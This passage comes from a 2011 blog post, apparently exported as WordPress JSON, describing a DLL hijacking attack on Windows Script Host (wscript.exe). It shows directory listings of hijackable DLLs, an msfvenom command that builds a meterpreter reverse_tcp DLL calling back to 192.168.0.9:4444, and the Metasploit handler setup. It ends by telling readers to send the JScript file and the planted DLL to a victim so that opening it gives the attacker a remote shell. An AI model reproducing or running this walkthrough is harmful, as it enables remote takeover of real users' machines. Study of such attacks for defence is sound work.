class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">47<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wab.exe_p7c_wab32res.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">47<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wab.exe_vcf_wab32res.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">47<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wab.exe_wab_wab32res.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wscript.exe_jse_wshen.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wscript.exe_jse_wsheng.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wscript.exe_jse_wshenu.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wscript.exe_js_wshen.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wscript.exe_js_wsheng.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wscript.exe_js_wshenu.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wscript.exe_vbe_wshen.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wscript.exe_vbe_wsheng.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wscript.exe_vbe_wshenu.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wscript.exe_vbs_wshen.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wscript.exe_vbs_wsheng.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wscript.exe_vbs_wshenu.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wscript.exe_wsf_wshen.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wscript.exe_wsf_wsheng.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wscript.exe_wsf_wshenu.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wscript.exe_wsh_wshen.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wscript.exe_wsh_wsheng.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">47<\/span> &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;wscript.exe_wsh_wshenu.dll<br \/>\n&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class=\"nu0\">0<\/span> File<span class=\"br0\">&#40;<\/span>s<span class=\"br0\">&#41;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class=\"nu0\">0<\/span> bytes<br \/>\n&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class=\"nu0\">24<\/span> Dir<span class=\"br0\">&#40;<\/span>s<span class=\"br0\">&#41;<\/span> &nbsp;<span class=\"nu0\">37<\/span>,<span class=\"nu0\">332<\/span>,<span class=\"nu0\">926<\/span>,<span class=\"nu0\">464<\/span> bytes <span class=\"kw2\">free<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>We have quite a few in this example but I will focus on wscript.exe&#8217;s vulnerability with how it loads the wshen.dll library. First of all we need to check it&#8217;s not a false positive.<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/><\/div><\/td><td><div class=\"bash codecolorer\">C:\\Documents and Settings\\Administrator\\Desktop\\wscript.exe_js_wshen.dll<span class=\"sy0\">&gt;<\/span><span class=\"kw2\">dir<\/span><br \/>\n&nbsp;Volume <span class=\"kw1\">in<\/span> drive C has no label.<br \/>\n&nbsp;Volume Serial Number is <span class=\"nu0\">8897<\/span>-ECF4<br \/>\n&nbsp;Directory of C:\\Documents and Settings\\Administrator\\Desktop\\wscript.exe_js_wsh<br \/>\nen.dll<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">21<\/span>:09 &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;.<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">21<\/span>:09 &nbsp; &nbsp;<span class=\"sy0\">&lt;<\/span>DIR<span class=\"sy0\">&gt;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;..<br \/>\n<span class=\"nu0\">19<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> &nbsp;<span class=\"nu0\">20<\/span>:<span class=\"nu0\">46<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class=\"nu0\">8<\/span> exploit.js<br \/>\n<span class=\"nu0\">25<\/span><span class=\"sy0\">\/<\/span>08<span class=\"sy0\">\/<\/span><span class=\"nu0\">2010<\/span> &nbsp;07:<span class=\"nu0\">30<\/span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class=\"nu0\">14<\/span>,<span class=\"nu0\">336<\/span> wshen.dll<br \/>\n&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class=\"nu0\">2<\/span> File<span class=\"br0\">&#40;<\/span>s<span class=\"br0\">&#41;<\/span> &nbsp; &nbsp; &nbsp; &nbsp; <span class=\"nu0\">14<\/span>,<span class=\"nu0\">344<\/span> bytes<br \/>\n&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class=\"nu0\">2<\/span> Dir<span class=\"br0\">&#40;<\/span>s<span class=\"br0\">&#41;<\/span> &nbsp;<span class=\"nu0\">37<\/span>,<span class=\"nu0\">332<\/span>,<span class=\"nu0\">922<\/span>,<span class=\"nu0\">368<\/span> bytes <span class=\"kw2\">free<\/span><br \/>\nC:\\Documents and Settings\\Administrator\\Desktop\\wscript.exe_js_wshen.dll<span class=\"sy0\">&gt;<\/span>exploit<br \/>\n.js<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Running the exploit.js code should now call the program that handles files with the *.js  extension but from the current directory, in this case the JScript Script File will be opened in the Microsoft (r) Windows Based Script Host Application which is vulnerable. The app will now load as usual but will load the malicious wshen.dll as it&#8217;s in the current directory, by default calc.exe should pop up as that&#8217;s what&#8217;s coded in the runcalc.dll that has been renamed to wshen.dll.<br \/>\nTo take this to the next step we will need to encode our own malicious DLL, to do this we will use metasploit&#8217;s msfvenom utility.<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\">.<span class=\"sy0\">\/<\/span>msfvenom <span class=\"re5\">-p<\/span> windows<span class=\"sy0\">\/<\/span>meterpreter<span class=\"sy0\">\/<\/span>reverse_tcp <span class=\"re2\">LHOST<\/span>=192.168.0.9 <span class=\"re2\">LPORT<\/span>=<span class=\"nu0\">4444<\/span> <span class=\"re5\">-f<\/span> dll <span class=\"sy0\">&gt;<\/span> <span class=\"sy0\">\/<\/span>root<span class=\"sy0\">\/<\/span>meterpreter_reverse_tcp.dll<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Now we need to ensure we have a listener running on TCP port 4444:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/><\/div><\/td><td><div class=\"bash codecolorer\">msf <span class=\"sy0\">&gt;<\/span> use exploit<span class=\"sy0\">\/<\/span>multi<span class=\"sy0\">\/<\/span>handler <br \/>\nmsf &nbsp;exploit<span class=\"br0\">&#40;<\/span>handler<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> <span class=\"kw1\">set<\/span> payload windows<span class=\"sy0\">\/<\/span>meterpreter<span class=\"sy0\">\/<\/span>reverse_tcp<br \/>\npayload =<span class=\"sy0\">&gt;<\/span> windows<span class=\"sy0\">\/<\/span>meterpreter<span class=\"sy0\">\/<\/span>reverse_tcp<br \/>\nmsf &nbsp;exploit<span class=\"br0\">&#40;<\/span>handler<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> <span class=\"kw1\">set<\/span> LHOST 192.168.0.9<br \/>\nLHOST =<span class=\"sy0\">&gt;<\/span> 192.168.0.9<br \/>\nmsf &nbsp;exploit<span class=\"br0\">&#40;<\/span>handler<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> exploit <span class=\"re5\">-j<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Exploit running <span class=\"kw2\">as<\/span> background job.<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Started reverse handler on 192.168.0.9:<span class=\"nu0\">4444<\/span> <br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Starting the payload handler...<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Now we must replace the wshen.dll with our meterpreter dll and send both to the victim. When they open the JScript file they will also open a meterpreter shell back to my attack box.<br \/>\n<iframe loading=\"lazy\" width=\"500\" height=\"375\" src=\"http:\/\/www.youtube.com\/embed\/vz_GMlAp5ko?feature=oembed\" frameborder=\"0\" allowfullscreen><\/iframe><\/p>\n","protected":false},"excerpt":{"rendered":"<p>So it&#8217;s been spoken of alot but i&#8217;d never actually got around to trying it. A colleague has been banging on about it for weeks and before he got chance to play with it a second colleague managed to use this in the wild. Sweet! I decided it would be worth playing with in order [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[64,1],"tags":[114,115,456,47,102],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/289"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=289"}],"version-history":[{"count":21,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/289\/revisions"}],"predecessor-version":[{"id":340,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/289\/revisions\/340"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=289"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=289"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=289"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}